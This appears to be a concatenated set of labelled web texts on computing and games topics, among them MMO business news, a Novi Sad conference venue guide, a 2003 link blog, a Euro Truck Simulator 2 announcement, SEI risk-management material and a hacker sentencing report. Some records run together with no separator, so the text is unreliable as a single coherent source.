Yoshida goes on to say that he doesn’t think it was subscriptions that hurt The Old Republic and The Secret World but the quality of the games themselves. Final Fantasy XI is an argument in Square-Enix’s favor. In the decade since the game came out, Square-Enix has earned on average around $48 million per year from the game, a tidy profit for a game whose expansions have been less frequent and less costly than those for Blizzard’s World of Warcraft.
Even as Final Fantasy XI continues to serve a devoted audience though, the future of Square’s subscription model is not guaranteed. First, the failure of Final Fantasy XIV’s initial release in 2010 may have shattered any mass appeal for the game. The MMO flopped so spectacularly that it was cited as the main reason for Square’s $150 million loss for fiscal 2011.
Meanwhile, Square’s other recently released MMO is struggling to find players. The subscription-based Dragon Quest X for Nintendo Wii has sold around just 634,000 copies since its August release. The game costs around $13 per month to play. Compared to past Dragon Quest releases, this is a poor showing. Dragon Quest IX for Nintendo DS, another online role-playing game, sold 4.3 million copies in its first six months on shelves. | 计算机 |
Google has recently discontinued Quick Search Box for Windows, which was included in Google Toolbar. If you liked the application, there's a way to use it, even if it's no longer available in Google Toolbar.

1. If you already have Google Toolbar for IE, it's likely that the toolbar has been updated to the latest version and you need to uninstall it. Just click the arrow next to the Google Toolbar wrench and select "Uninstall".
2. Install an older version of Google Toolbar for IE (6.3).
3. Now you can install the latest version of Google Toolbar from toolbar.google.com or wait until the application updates itself. You can also install the most recent version from FileHippo.
Novi Sad, Serbia
19th Annual IEEE International Conference and Workshops on the Engineering of Computer Based Systems
Journal Special Issue
IEEE ECBS 2011
IEEE ECBS 2012 will be held at the Hotel Park.
Address: Novosadskog Sajma 35, 21000 Novi Sad, Serbia.
Web presentation: http://www.hotelparkns.com/
About Novi Sad
Novi Sad, a city in Vojvodina, Serbia's northern province, lies on the banks of the river Danube, next to the Fruska Gora national park. Twenty percent of the entire Vojvodinian population lives in Novi Sad. It is the second largest city in Serbia.
What differentiates Novi Sad from other cities in Serbia is its wide diversity of nationalities, cultures and religions. Five Orthodox churches, a Jewish synagogue and a Catholic cathedral in the very heart of Novi Sad symbolize the multiculturalism of this city. As the second biggest city in Serbia, Novi Sad is becoming the main cultural center in the country and bears the name "Serbian Athens".
Some of the main cultural events that take place in Novi Sad every year are "Sterijino pozorje" (a theatre festival), the traditional "Zmajeve decije igre" (a children's festival) and the famous "EXIT" - one of the best music festivals in Europe. Novi Sad also hosted the European Basketball Championship in 2005. These and many other events contribute greatly to the image of Novi Sad, Vojvodina and the entire country. Novi Sad is a university city, a city of museums, galleries, libraries, theatres... It is a center of well-developed journalistic and publishing industries, radio and television. Novi Sad is the seat of Matica Srpska and a city of fairs with many traditional and internationally recognized manifestations. It is a railway and road crossing on the main international route from Athens and Istanbul to Budapest.
Serbian is in official use in the City, as is the Cyrillic alphabet. Hungarian, Slovak and Ruthenian are also in official use, along with their alphabets, in accordance with the Law and the Decision of the City Assembly of Novi Sad.
History of Novi Sad
According to historians, anthropologists and archeologists, the area of Novi Sad was inhabited as early as 4500 BC. Many civilizations passed through this area: Celts, Romans, Byzantines, Ostrogoths, Avars. Some of them stayed for a while and others moved on. Millennia after the first inhabitants came to this area, Novi Sad, with the well-known Petrovaradin at its epicenter, was born.
Thanks to Maria Theresa, the Habsburg empress, Novi Sad, like other nearby areas of the empire, developed quickly, both culturally and economically. On February 1, 1748, Novi Sad was proclaimed a "Free Royal City". Today, 260 years later, with its 300,000 citizens, the Petrovaradin Fortress, the river Danube, Fruska Gora and its monasteries, Novi Sad has become a most desirable destination for young Europeans. Warmth, hospitality, and a diversity of languages, cultures and nationalities make Novi Sad a truly cosmopolitan city.
Have to see...
Petrovaradin Fortress
The historic Petrovaradin Fortress is built high on the banks of the River Danube, offering stunning views over the city of Novi Sad. It is an ancient fortress site, originally occupied by the Romans, and rebuilt by the Austro-Hungarian Empire to defend against the Turks in the 17th century. Emperor Leopold began work on its construction, but it was finished under Emperor Joseph, son of Empress Maria Theresa. It received its first garrison in 1702 (a regiment of Hungarian hussars, light cavalry and units of Serbian haiduks).
During the First and the Second World Wars it was a military garrison, and that is what it remained until 1951, when it was turned into a civilian site, used for cultural, artistic and tourist purposes. The Clock Tower (Sahat Kula), a monumental structure on the bastion of St. Louis (Ludwig of Baden), dominates the whole fortress.
Serbian National Theater
The new building of the Serbian National Theatre, designed by the architect Professor Dr. Viktor Jackiewitcz, is situated in the center of the town. The building was opened on March 28, 1981 (a day after World Theatre Day). In the 120th season of its existence, the SNT got its own building for the first time. That date was then established as the Day of the Serbian National Theatre, when the results of the previous season are evaluated, and the best individual and collective achievements are awarded.
The building itself spreads over more than 20,000 square meters, housing the Opera (with the Choir and Orchestra), Drama and Ballet ensembles, performing on four stages. The ballet, orchestra and choir rehearsal rooms are on its premises too. The workshops are housed in the building as well, except the "Kombinat", which produces the heavy equipment and scenery.
Dunavska Street
The most charming street in Novi Sad is Dunavska Street. Very short, in the heart of the center, it is full of colorful facades, many signs and shops. It looks as if time has stopped there. It leads straight into Dunavski Park.
Catholic Cathedral
One of the symbols of Novi Sad, this neo-Gothic cathedral, built between 1893 and 1895, is situated in the main central square of Novi Sad, the Square of Freedom.
The cathedral has beautiful tall, thin spires. It is recognizable by its high clock tower and by its stained-glass windows, made in Budapest. It was built on the site of an earlier church from the mid-18th century and is devoted to St. Mary.
The Synagogue

The building of the new synagogue, the fifth to be erected on the same location since the 18th century, became a major project for the entire Jewish community of Novi Sad under the leadership of Dr. Karl Kohn, who served as its president for nine years (1895-1906).
Building work on the Novi Sad synagogue started in 1905 and was finished in 1909. The new synagogue was part of a larger complex that included, on both sides of the synagogue, two buildings decorated in a similar pattern. One sheltered the offices of the Jewish Community and the residences specially built for the synagogue officials, while the other served the Jewish school. Located in Jevrejska (Jewish) Street, close to the city center, the synagogue has been recognized as a landmark of Novi Sad since its inauguration.
Matica Srpska
Matica srpska (lit. "Serbian matrix", meaning "parent body of the Serbs") was founded by patriotic Serbian intellectuals and rich traders in 1826 in Pest.
It was moved from Pest to Novi Sad in 1864 (under Jovan Forovic), into the building bequeathed by Mrs. Marija Trandafil, the famous philanthropist from Novi Sad. The present building was built in 1912, in pseudo-classicist style, to a design by Momcilo Tapavica (an architect, a top-class sportsman, and the first Serb to participate in the Olympic Games). It houses the journal "Letopis", a rich library, an art gallery and a publishing house. In front of the building are sculptures of all the presidents of Matica srpska: Jovan Hadzic, Sava Tekelija, Teodor Pavlovic, Platon Atanackovic, Tihomir Ostojic and Vasa Stajic.
The Matica srpska Society was one of the initiators of the Novi Sad Agreement on the Serbo-Croatian language (1954) and led the effort to produce a unified orthography of the language (1960). It compiled The Vocabulary of the Serbian Standard Literary Language in six volumes (1967-1976).
Matica srpska publishes the "Letopis Matice srpske" magazine, one of the oldest in the world, continuously published since 1824. The Law on the Matica srpska Society (1986) regulates matters of endowments and legacies given by national benefactors, and how the money is spent on various cultural and educational purposes.
City Hall

It is one of four monumental buildings on Liberty Square (Trg Slobode), the main city square.
It was built in 1895 and designed by a well-known architect Gyorgy Molnar.
The two-floor building is in the neo-baroque style, with a richly decorated interior. There are 16 allegorical statues, the work of Julije Anika, along the facades. You can see the town's coat of arms on the upper part of the facade facing the square. The building is also crowned by a high tower with the bell of St. Florian - Matilda.
Today, the City Hall is the seat of the local authorities, i.e. the Executive Council of the Assembly of Novi Sad, which is the executive body of the City Assembly.
The Orthodox Cathedral Church of St. George
(The Congregational Orthodox Church - Saborna Crkva)
The Cathedral church of Novi Sad is dedicated to the Holy Great Martyr George. It was built in the baroque style in 1734, in the time of the Empress Maria Theresa, the Patriarch Arsenije IV Jovanovic and the archpriest Visarion Pavlovic. It burnt down during the bombing in 1849. It was rebuilt in 1860-80, and the last reconstruction took place in 1905, thanks to the archpriest Mitrofan Sevic, after a design by Mihajl Harminc, an architect from Budapest. A new tower with new bells from Budapest was built as well. The twenty-six icons on the iconostasis, the two historical paintings above the choir stalls and the two great icons (on the Mother of God's and the archpriest's thrones) were made in 1905 by the Serbian academic painter Paja Jovanovic, who also supervised the wall decoration. The stained-glass windows were made by Imre Zseler in Budapest after drawings by Paja Jovanovic. The wall paintings were made by Stevan Aleksic. The church is located in Pasiceva Street. Church of the Great Martyr St. George (the Congregational Orthodox Church)
Vigil: Saturdays and holidays at 17h
St. Liturgy: Sunday, holidays at 9h, Saturday after the morning service
The Three Saint Bishops Church
This church was built by Serbs who settled on the periphery of the former Petrovaradin Trench after moving from the village of Almas in 1718. Made of sticks, it could not last long, so on the same spot a new, larger one was built, which the archpriest Visarion Pavlovic consecrated in January 1733. In 1797 a new one was built again. It is the biggest Orthodox church in Novi Sad. It acquired its present look at the end of the 18th century, when it was renovated for the last time in the early classicist style. The wood carving was done by Aksentije Markovic, the iconostasis and wall paintings by Arsenije Teodorovic, the famous painter, who was buried in the churchyard. In 1905 Uros Predic painted the icon of the Virgin Mary on the throne. The church is located in Almaska Street. Church of the Three St. Bishops (Almaska Church), 13 Almaska Street
St. Liturgy: Sunday, holidays at 9h | 计算机 |
The world's biggest PC video game makers aren't very happy about Microsoft's new operating system, Windows 8. Speaking with one-time Microsoft Game Studios chief Ed Fries at Casual Connect earlier this week, Valve's Gabe Newell described Microsoft's plans as a "catastrophe."
“Windows 8 is kind of a catastrophe for everybody in the PC space,” said Newell, “I think that we’re going to lose some of the top-tier PC [original equipment manufacturers]. They’ll exit the market. I think margins are going to be destroyed for a bunch of people. If that’s true, it’s going to be a good idea to have alternative to hedge against that eventuality.”
Newell says this is why Valve is pushing hard to bring its games, its Source engine, and the Steam digital distribution platform to the Linux operating system.
Is he alone in thinking that Windows 8 will be a disaster for the PC gaming industry? Apparently not. Rob Pardo, the StarCraft designer and current vice president of game design at Diablo III studio Blizzard, said that he believes Microsoft's new operating system will also be a thorn in his company's side.
Pardo Tweeted on Wednesday, “Nice interview with Gabe Newell—‘I think Windows 8 is a catastrophe for everyone in the PC space’—not awesome for Blizzard either.”
The belief in the development community is that Microsoft will make Windows 8 a closed system, an operating system that seeks to control applications much more stringently, in the way that Apple does with Mac OS X and the iOS platform. This would allow Microsoft to better monitor the quality of applications running on its platform, but it would also wall off the most widely used operating system in the world from myriad developers. PC game makers use Windows because of the openness of the platform and its ubiquity. If Microsoft takes that openness away, what will developers do?
Windows 8 won’t be released until October of this year, so Microsoft still has time to decide exactly how free game and application makers will be to use the system. Valve and Blizzard are, by sales and reputation, the biggest PC game makers in the world and their influence over Microsoft’s platform isn’t insignificant. If Blizzard and others follow Valve to Linux platforms, what will Microsoft do to lure them back? Will PC gaming become increasingly based on streaming and browser-based solutions? | 计算机 |
August - October 2002
Not Exactly a Weblog; Maybe a Webzine - December 31, 2003 - Need a friend on New Year's Eve? Try Friendster. This is a unique service that allows users to make online profiles of themselves and then connect with others with similar interests, creating online communities. It follows on the concept of "6 degrees of separation" - that everyone is somehow related to someone else with some kind of tie through others. The site is not just for dating; some fictitious identities have emerged, called Pretendsters, which can include everything from fruits to colleges. Other sites have sprung up including Tribe.net and Everyonesconnected.
December 30, 2003 - If you want to understand some of what goes on behind the scenes at the Google search engine, check out Scroogle. They are stirring up a controversy about how Google is selectively filtering out some websites from key words in the search. There is a demo which you can use to compare.

December 29, 2003 - For those of you who are into enhancing websites with JavaScript and other code, try Mind Palette - Indianapolis Web Design. There is some cool stuff and tutorials, many of which relate to the Adobe GoLive software, a decent web editing tool. If you are not that technically inclined, check out the home page and move your mouse over the eye to see what happens.

December 28, 2003 - Earth Observatory from NASA has some beautiful views of earth features from space. In addition, this website details some of the research NASA scientists are doing with this data. You can even view the recent earthquake damage of Bam, Iran. You can enlarge images, but they may take a while to download. Also, Internet Explorer tends to change them to fit the screen after they are loaded. Move your mouse over the image and click on the expand-image button to make it large again.

December 27, 2003 - Project VII is a web design group which has developed many designs and widgets for creating interesting websites. All are for a charge, but fun to test out for free - check out the demo selection box at the bottom of the page. I also discovered that the new Dreamweaver MX 2004 has several site templates using cascading style sheets for excellent, professional-looking websites. Watch for one here soon. Note: the Macromedia website for Dreamweaver will probably require you to upgrade your version of Flash.
December 25, 2003 - Mars Express from the European Space Agency.
December 24, 2003 - More websites on Mars exploration are available. This one, Center for Mars Exploration or CMEX provides a host of images which you may not have seen. Click on Gallery and then Fun and Strange.
December 22, 2003 - High resolution photography of earth from space is now even more accessible. Check out the HiRISE website, which demonstrates how space-based cameras can view boulders in the Grand Canyon.

December 6, 2003 - Cleveland culture is alive and well, as are its websites. Just went to the Cleveland Museum of Art Jasper Johns Numbers show and the Cleveland Botanical Garden (the Glass House of two environments is especially good). Also, planning to see the Contemporary Youth Orchestra, a local orchestra of high school students who perform 20th (and 21st) century music including new compositions. Visited Heights Arts, a small local gallery now having a Holiday sale/show.

December 5, 2003 - Came across the InternetTourBus, a weird website which combines help for virus protection and strange things. Click on that link and try out some of this stuff. I like the Traffic Cone Preservation Society.
December 4, 2003 - There is a new book and website to think about: 5 Patterns of Extraordinary Careers. Includes a quiz to try out and presentation tools. Is this just another business success book trying to become a trend or is there really something here?
December 3, 2003 - There are a growing number of amateur astronomer websites with their latest photos. One example is here, which shows a gallery of new photos. The equipment is now available for amateurs to create better photos than professional astronomers could produce 25 or 30 years ago. Unfortunately, you have to scroll through the technical photography info, but it is worth it. Some photos may take a long time to download, and look out for the popup ads.
December 2, 2003 - Join Joe is a website at The Cleveland Clinic on an initiative by Joe Eszterhas, the Hollywood screen writer, to launch his anti-smoking campaign. Maybe you've seen his public service ads on TV. If not, view them through this website.
December 1, 2003 - The Onion and The Spoof are two websites which look like the real news but aren't. Good for some laughs about current politics, society and news, just as long as you don't believe it is true.
October 8, 2003 - Did you know that the CIA has a free factbook online. It includes maps, country profiles, flags, etc. You can download or order a copy. Is anyone watching?
October 7, 2003 - Hurricane Isabel washed over the east coast in September. This astronomy photo shows an interesting comparison of spiral galaxies to hurricane Isabel.

October 6, 2003 - Although the second anniversary of September 11 is past, CNN has a wonderful memorial site with photos, brief identifying information, and tributes.
October 5, 2003 - A planet-wide color movie of Jupiter. May take a while to download but worth it. Watch the swirls.
October 4, 2003 - More Mars photos from the Mars Orbiter including a photo of the polar cap from above, something not visible from Earth.
October 3, 2003 - Just a cool website. Can you figure out how to follow links and view the work that they have done? Check out Aue Design. October 2, 2003 - A new observatory openned recently called Gemini. The name is not just of a consellation but also signifies that it is actually made up of two telescopes continents apart one in Hawaii and one in Chile. "The Gemini Observatory is an international collaboration that has built two identical 8-meter telescopes. The Frederick C. Gillett Gemini Telescope is located at Mauna Kea, Hawai`i (Gemini North) and the other telescope at Cerro Pachón in central Chile (Gemini South), and hence provide full coverage of both hemispheres of the sky. Both telescopes incorporate new technologies that allow large, relatively thin mirrors under active control to collect and focus both optical and infrared radiation from space."
October 1, 2003 - A friend shared this Mortgage Calculator - you can move slides back an forth to change amount, length of mortgage, interest rate, etc. and the page dynamically creates a graph of principle and interest over the life of the loan. August 30, 2003 - What is your favorite color? Now you can vote on the Internet at favcol.com. Send an email with your favorite photo or image and your's will be added to the mix. Click on How Does It Work? for more info.
August 29, 2003 - Need a cheap computer to access the Internet? Try WebStation from Lindows. It is promoted as, "The lowest priced Internet-enabled computer ever! The Lindows WebStation is the first ultra-affordable, "unbreakable" computer designed specifically for Web work." Only $169 but you need to buy a monitor at $100 or $300 for flat screen. What is Lindows? See August 28.
August 28, 2003 - Lindows is a PC version of the Linux Operating System. What this means is an alternative to Microsoft Windows which is a significant cost when you buy a new computer (Lindows is only $59). Lindows provides a web browser, email, etc. May be safer from viruses also.
August 27, 2003 - There is much which could be said about the close approach of Mars. If you don't have a telescope handy, let the Hubble Space Telescope do the work. Hubble occasional turns from studying the deep sky objects and the origins of the universe and looks at planets. Try the rotating Mars globe images also. Quite a treat.
August 26, 2003 - Mars has brought attention to the activities of amateur astronomers and their ability to perform incredible astrophotography. This story in Wired magazine is titled, Backyard Paparazzi to the Stars. Also, a member of an amateur group was featured on a local station in Dallas.
August 25, 2003- I must recommend the vacation spot which good friends invited us to this summer, Edisto Beach, South Carolina. South of Charleston (which we also visted), it is a wonderful, quiet place. Quite a contrast to the big resort we visited almost a decade ago, Wild Dunes.
August 24, 2003 - In searching for a new car this month, I visited a number of websites including Consumer Reports but especially, Edmunds.com. Edmunds has tons of information about cars, calculators for estimating your trade-in and estimating loan payments. Also, it gives reviews submitted by new car owners, like, "I got mine for $1000 under the sticker price."
July 27, 2003 - Steve Wozniak, one of the founders of Apple Computer has an extensive personal website called Woz.org. Includes questions and answers, a corner for the cofounder, Steve Jobs, and a Woz Cam to view Steve in his office. Lots of references to the Mac, I am surprised that it doesn't say, "Best viewed with a MacIntosh Computer."
July 26, 2003 - Bonaire WebCams claims it is the home of the world's first permanent underwater ReefCam, giving you a peek at reef life in the Bonaire Marine Park! It includes a reef cam, a beach cam and others. Best if viewed during the Carribian daytime hours. July 25, 2003 - What do you find if you do a search at Google.com, the web's most popular search engine for Weapons of Mass Destruction? The number one on the list looks like an error message unless you read it carefully. A real comment on the war in Iraq which was first noted in a British newspaper, The Guardian.
July 24, 2003 - Meetup.com is a new website service which allows you to set up an in person meeting with any group of people. Already there are 1546 different topics from politcs to Dungeons and Dragons. Haven't tried it yet since I have a similar function for work meetings. Will see if it is successful.
July 7, 2003 - Read in the New York Times today about people spending bundles of money on coffee makers including thousands on commercial expresso machines. One website noted was CoffeeGeeks.com. Another was: WholeLatteLove.com. some people get very serious about their cup of java!
June 22, 2003 - You may have seen this one in the paper: DonsBoss.com. Don has assembled some tools to download to your computer to pretend you are working while you are surfing the web or playing games at work. The test of the typing soundars are my particular favorite. You have to scroll down to see the full page. The fake spreadsheet even hides which website you are going to when you hit this page.
June 21, 2003 - What is iLoo? A hoax, a future product of Microsoft, an Internet toilet. Read about the phantom product idea by Microsoft in England which has all but disappeared except the rumors. Latest denials are on MSN.com
June 20, 2003 - May 23 was the birthday of Java Programming Language. Again, you might not care unless you are really into the web, but if you notice on a web page the message "Applet loading" or "Running Applet", that is Java at work. Launched on May 23, 1995 by Sun Microsystems, it has the capability of running on any operating system (known as being "agnostic" in web speak) which gives it real advantages in the web world where everyone is running web pages on different systems. Source: wiki.com. Wiki is in itself and interesting phenomenon which is defined as: The simplest online database that could possibly work. June 18, 2003 - Programming for Information Architects may sound boring except to web designers interesting in understanding the mysteries of progamming but most of this article can be appreciated by the lay reader familiar wit the Internet. It is helpful to understand some of the work behind the magic which programming creates in web pages.
June 17, 2003 - The 101 Dumbest Moments in Business published by Business 2.0 includes some now obvious mistakes in business which failed.
May 9, 2003 - If you wonder how web pages work or know some of the code that makes them up, called HTML, check out this reference site: Sizzling HTML Jalfrezi. It is good for beginners and more advanced users and can help from fixing problems to creating new, beautiful pages. This site recommends another beginner's guide developed by the National Center for Supercomputing Applications (NCSA).
May 8, 2003 - Sometimes a site is worth going to just because it looks cool. It you have the patience for the Flash program to download, there is lots to find here: Theory 7 - The Flash Store shows what several creative people have done with Flash and puts the art up for sale. Check out the buttons to bounce around. The link opens a new window.
May 7, 2003 - Preventing health care fraud on the Internet is a big task. Some sites which are helping and worth checking out are the Federal Trade Commission, and The National Council Against Health Fraud. May 6, 2003 - The latest award website is Privacy International's Stupid Security Contest Winners. These are submitted from throughout the world to a real panel of security experts. It is quite a catalog of security gone wild.
May 5, 2003 - A total lunar eclipse is coming up on Thursday, May 16th, goin total at 11:15pm. Should be a good one for the eastern USA. For a short explanation, go to Sky and Telescope's page, but for a more detailed and techical presentation of what to expect, try this NASA press release.
February 19, 2003 - I read more each day about the Myers-Briggs Type Indicator and wonder about the science behind it. Anyone who knows the history behind the four temperments knows that it has its roots in Medival and Greek "science" of the four humors in which based on having too much of one humor the "physician" removed it through blood-letting, diaretics, cough expectorants, etc. What makes it so scientific that it is taught in colleges, continuing education, business consultants? It has even been adopted by modern astrologers.
February 16, 2003 - I recently spoke to a Man-to-Man support group in Cleveland. These are support groups which support men with prostate cancer and their spouses. In preparation, I came across Cancer News and may add the news headlines to this website in the near future.
February 15, 2003 - A cool little piece of web technology which allows a back to top link down the page as you scroll. Check out the link on this page which floats next to the story.
February 14, 2003 - Silicon Valley has so far refuse to give up punch cards for voting even though most of California has moved on to electronic voting. Odd that this county were the high tech revolution began is resisting change. News item from Wired magazine.
February 13, 2003 - Check out this cool design, Nick Finck.com. A simple design with single words of text and photos of nature. Communicates well with such a simple design.
February 12, 2003 - Again the Cleveland Clinic website has won several awards from the WWW Health Awards including: Taussig Cancer Center (Silver), Department of Dentistry (Silver), e-Cleveland Clinic Second Opinion Program (Bronze), Center for Corporate Health (Bronze), Department of Pain Management (Bronze).
February 2, 2003 - Funny signs - The Savvy Traveler, an NPR program I sometimes listen to on the weekends, has a page devoted to signs which are good for a laugh. Make sure you check these out before you travel.
February 1, 2003 - There are a number of websites to obtain information about the Shuttle loss. These include: Spaceflightnow.com , NASA's office Shuttle Site.
January 25, 2003 - In the news this week is Kaiser Permanente, the nation's largest HMO, who will put their treatment guidelines on their website available to members. This is to include public access. Treatment guidelines have typically been created by doctors for doctors, so this is an another source of information for those with a diagnosed condition. They are not the first to put treatment guidelines on the the web, however. The Cleveland Clinic has these on their medical eduction website for some diseases written for a professional audience.
January 24, 2003 - I don't usually bother with hoaxes or their disproof but came across an interesting one related to the Apollo program. With all the claims that the landing on the moon was a NASA hoax, one engineer built an extensive website to disprove all of the claims at Moon Base Clavius.
January 23, 2003 - We recently visited the Peter B. Lewis building, Cleveland's only Gehry designed structure which is the home of the Weatherhead School of Management, Case Western Reserve University. Beyond the architecture, which features amazing stainless steel ribbons, the technology is equally cutting edge. It is featured in Cisco Systems IQ Magazine.
January 22, 2003 - There is still free stuff on the Internet. Hits4Me.com has lots of free tools for websites. I hope to try some of them soon. Watch for new features.
January 18, 2003 - Recently went to a party and met a guy wearing a Netscape 7 sweatshirt. Turns out he not only has his own website but is an avid writer on the topic of Cascading Style Sheets, Check out who he is and his books at Meyerweb.com. CSS are defined as: By attaching style sheets to structured documents on the Web (e.g. HTML), authors and readers can influence the presentation of documents without sacrificing device-independence or adding new HTML tags.(from What are Style Sheets?)
January 12, 2003 - A major conference on Healthcare Information Technology will take place in early February, the Healthcare Information and Management Systems Society or HIMSS. I have the honor of presenting a paper there on a new project. The abstract is entitled, "Creation of a Single Access Method Approach for Physicians".
January 11, 2003 - Another Google feature - their news service which is "editor-less". Basically, it is a search of 4000 news services so no writing or editting is required by Google itself. According to the email newsletter Ascribe, "The most amazing aspect of the Google service, however, is that the story selection is done entirely by computer without the need for flesh-and-blood editors. January 10, 2003 - This is a rather sad commentary on workplace motivation: someone has create a whole site created as a satire of motivational photos which have become popular in recent years. Despair.com is not a site devoted to depression but posters an caledars which mock the motivational messages. Some are pretty funny.
January 9, 2003 - I've added a Google search box to my home page. Google has the code readily available for any website. The search results page may include advertising or "sponsored links", aka advertising.
January 8, 2003 - With winter well on it's way in Northeast Ohio, I have been check Accuweather Radar online. Weather.com of the Weather Channel is also a good source for weather but I like the Accuweather format with the tabs at the top of the page for navigating the site. Click on the "Animate this map". Try your own area.
Best business mags:
Business 2.0
Line 56
New find: Weblog
Camworld - cool ability to modify style sheets with buttons | 计算机 |
In 2003, Nate established his second font studio, Providence Type, as an outlet for his non-comics typography. Providence Type combines his love of fonts and his affinity for the capitol city of Rhode Island; all the ProvType fonts are named for streets and features of the “Renaissance City”.
Nate is also a musician, a professional graphic designer and an illustrator and lives with his wife in rural Rhode Island.
Born: Rhode Island, 1975
Providence Type
139 font families by Nate Piekos
AvéAvé BB™
by Blambot | 计算机 |
Dear friends of truck simulation games,
I have news about the Euro Truck Simulator 2 release: finally, we are ready to commit to a specific release time.
This piece of good news may however be mixed with a bit of disappointment, especially for the less patient among you. We have been working on the game for almost two years, sticking to the proverbial "when it's done" planning all this time. Now, at last we are confident that the status of "good enough to be proud of the achievement" is on the horizon.
We have set the release time to the first week of August 2012.
We are aware that waiting almost 6 more months is a lot for many of you. We haven't announced any release date ourselves until now, but some of our distributors have been working with speculative time-frames for the release, raising hope among you of an earlier release.
Taking 30 months to develop a game is a tough decision to arrive at. It is testing the patience of you - fans of our games, it is testing the patience of our distributors, and it is definitely testing the dedication of the development team. However, we are confident that it was The Right Thing to do - we needed enough time to re-factor the graphics engine at the core of the game and to develop the cool effects on top of it, we needed the time to build the high-detail 3D models to populate the virtual world with, and it took considerable effort and time to establish industrial and commercial relationships that will elevate our games to a new level. Giving in to time pressure would only result in us having to make too many compromises. We have just one chance to make a good first impression.
Euro Truck Simulator 2 will bring a massive improvement over our previous games, but in fact, it will "only" be a major milestone along a long and winding road ahead. There are many cool features that we would like to add, but lots of things will have to wait for a future game or games. Our wish list is very long, and you are constantly helping us grow it even longer with your input and feedback. It would be a dream scenario to be able to pack all those features in - season changes through the year, cities teeming with pedestrians, other types of big vehicles to drive, being able to get out of the cabin and explore the world on foot, vehicle damage from collisions, real brands for everything in the world, loading and unloading cargo from the trailer, multiplayer, covering all of Europe from the Iberian Peninsula to the Ural mountains, from the polar circle to Asia Minor, and then going beyond the confines of Europe to both North and South America, to Africa, Asia and Australia - the list goes on and on. Euro Truck Simulator 2 should be a solid step towards the goal of the ultimate truck simulator, but only the first such step (well, second actually). With your continuing help and support, we want to continue the effort beyond the release of the game and take the remaining steps in the years to come.
Many of you may question why we are taking so long, why we are not able to grant more of your wishes for features to include, and why we are not covering more European countries. The answer is the same one we have always offered - truck simulation games are far from mainstream, and limited sales of our past games can only support a small development team. With ETS2 we have taken a bold step to grow the team size, from 5-7 to a bit over 10 people, but compared to AAA driving game productions with hundreds of people on payroll, we are tiny. We are trying to punch above our weight, putting in as much content and as many features as we could humanly manage to produce, but to build even more, we will have to rely on profits that should hopefully come from future sales of our games. If you want more features, a bigger world and more vehicles in our games, all I can say is this: If you consider our games worth playing, consider them worth buying, too. Recommending them to friends wouldn't hurt either.
Your wait for something new from SCS Software doesn't have to take the full six months, though. As you have learned with the release of Trucks & Trailers, there are actually two internal teams at SCS Software now working in parallel. While the bigger team is still toiling on our opus magnum - Euro Truck Simulator 2, the smaller team is now taking advantage of a new opportunity arising out of our cooperation with the transportation industry. Very soon, you can expect an announcement about an exciting project that's under way in our labs, a project which should be out even before ETS2 hits the stores. These smaller projects turn out to be significant contributors to pursuing the dream of the ultimate all-encompassing truck sim, and while they deserve merit on their own, we hope that you can understand that they are not delaying us from working on ETS2, but rather helping us finance its development and broaden its feature set.
Please keep your impatience in check, stay loyal to us, and keep your eyes and mind open for future announcements from SCS Software on this blog. To make the long wait a bit more tolerable, we will be sure to post more news, images and movies of what we are working on.
Pavel Sebor
CEO, SCS Software
Consider a broad range of conditions and events that can affect the potential for success, and it becomes easier to strategically allocate limited resources where and when they are needed the most.
The SEI has been conducting research and development in various aspects of risk management for more than 20 years. Over that time span, many solutions have been developed, tested, and released into the community. In the early years, we developed and conducted Software Risk Evaluations (SREs), using the Risk Taxonomy. The tactical Continuous Risk Management (CRM) approach to managing project risk followed, which is still in use today—more than 15 years after it was released. Other applications of risk management principles have been developed, including CURE (focused on COTS usage), ATAM® (with a focus on architecture), and the cyber-security-focused OCTAVE®. In 2006, the SEI Mission Success in Complex Environments (MSCE) project was chartered to develop practical and innovative methods, tools, and techniques for measuring, assessing, and managing mission risks. At the heart of this work is the Mission Risk Diagnostic (MRD), which employs a top-down analysis of mission risk.
Mission risk analysis provides a holistic view of the risk to an interactively complex, socio-technical system. The first step in this type of risk analysis is to establish the objectives that must be achieved. The objectives define the desired outcome, or "picture of success," for a system. Next, systemic factors that have a strong influence on the outcome (i.e., whether or not the objectives will be achieved) are identified. These systemic factors, called drivers, are important because they define a small set of factors that can be used to assess a system's performance and gauge whether it is on track to achieve its key objectives. The drivers are then analyzed, which enables decision makers to gauge the overall risk to the system's mission.
The MRD has proven to be effective for establishing confidence in the characteristics of software-reliant systems across the life cycle and supply chain. The SEI has applied the MRD in a variety of domains, including software acquisition and development; secure software development; cybersecurity incident management; and technology portfolio management. The MRD has also been blended with other SEI products to provide unique solutions to customer needs.
Although most programs and organizations use risk management when developing and operating software-reliant systems, preventable failures continue to occur at an alarming rate. In many instances, the root causes of these preventable failures can be traced to weaknesses in the risk management practices employed by those programs and organizations. For this reason, risk management research at the SEI continues. The SEI provides a wide range of risk management solutions. Many of the older SEI methodologies are still successfully used today and can provide benefits to your programs. To reach the available documentation on the older solutions, see the additional materials.
The MSCE work on mission risk analysis—top-down, systemic analyses of risk in relation to a system's mission and objectives—is better suited to managing mission risk in complex, distributed environments. These newer solutions can be used to manage mission risk across the life cycle and supply chain, enabling decision makers to more efficiently engage in the risk management process, navigate through a broad tradeoff space (including performance, reliability, safety, and security considerations, among others), and strategically allocate their limited resources when and where they are needed the most. Finally, the SEI CERT Program is using the MRD to assess software security risk across the life cycle and supply chain. As part of this work, CERT is conducting research into risk-based measurement and analysis, where the MRD is being used to direct an organization's measurement and analysis efforts. Spotlight on Risk Management
The Monitor June 2009
New Directions in Risk: A Success-Oriented Approach (2009)
A Practical Approach for Managing Risk
A Technical Overview of Risk and Opportunity Management
A Framework for Categorizing Key Drivers of Risk
Practical Risk Management: Framework and Methods | 计算机 |
Cosmo the God, a 15-year-old UG Nazi hacker, was sentenced Wednesday to six years without Internet or access to a computer.
The sentencing took place in Long Beach, California. Cosmo pleaded guilty to a number of felonies including credit card fraud, bomb threats, online impersonation, and identity theft.
UG Nazi, the group Cosmo runs, started out in opposition to SOPA. Together, Cosmo and the group managed to take down websites like NASDAQ, CIA.gov, and UFC.com, among others. Cosmo also created custom techniques that gave him access to Amazon and PayPal accounts.
According to Wired's Mat Honan, the terms of Cosmo's probation, which lasts until he is 21, will be extremely difficult for the young hacker:
“He cannot use the internet without prior consent from his parole officer. Nor will he be allowed to use the Internet in an unsupervised manner, or for any purposes other than education-related ones. He is required to hand over all of his account logins and passwords. He must disclose in writing any devices that he has access to that have the capability to connect to a network. He is prohibited from having contact with any members or associates of UG Nazi or Anonymous, along with a specified list of other individuals.”
